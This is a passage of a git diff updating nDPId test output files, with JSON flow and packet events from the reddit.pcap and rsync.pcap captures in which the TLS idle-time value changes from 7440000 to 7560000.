+00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","packets-captured":11682,"packets-processed":11682,"total-skipped-flows":0,"total-l4-data-len":10573423,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":59,"total-detection-updates":84,"total-updates":0,"current-active-flows":0,"total-active-flows":60,"total-idle-flows":60,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":447,"global_ts_msec":1605291698785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11682/11682 diff --git a/test/results/rsync.pcap.out b/test/results/rsync.pcap.out index 4a6aa54c8..c6c6bc183 100644 --- a/test/results/rsync.pcap.out +++ b/test/results/rsync.pcap.out @@ -1,11 +1,11 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rsync.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1387144174826} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387144174826,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387144174826,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8ACBAAEAGPJp\/AAABfwAAAdTZA2mzXXC1AAAAAKACqqr+MAAAAgT\/1wQCCAoAPHCVAAAAAAEDAwo="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQNp1NlRGhcWs11wtqASqqr+MAAAAgT\/1wQCCAoAPHCVADxwlQEDAwo="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387144174826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA0ACFAAEAGPKF\/AAABfwAAAdTZA2mzXXC2URoXF4AQACv+KAAAAQEICgA8cJUAPHCV"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387144174826,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387144174826,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8ACBAAEAGPJp\/AAABfwAAAdTZA2mzXXC1AAAAAKACqqr+MAAAAgT\/1wQCCAoAPHCVAAAAAAEDAwo="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387144174826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQNp1NlRGhcWs11wtqASqqr+MAAAAgT\/1wQCCAoAPHCVADxwlQEDAwo="} 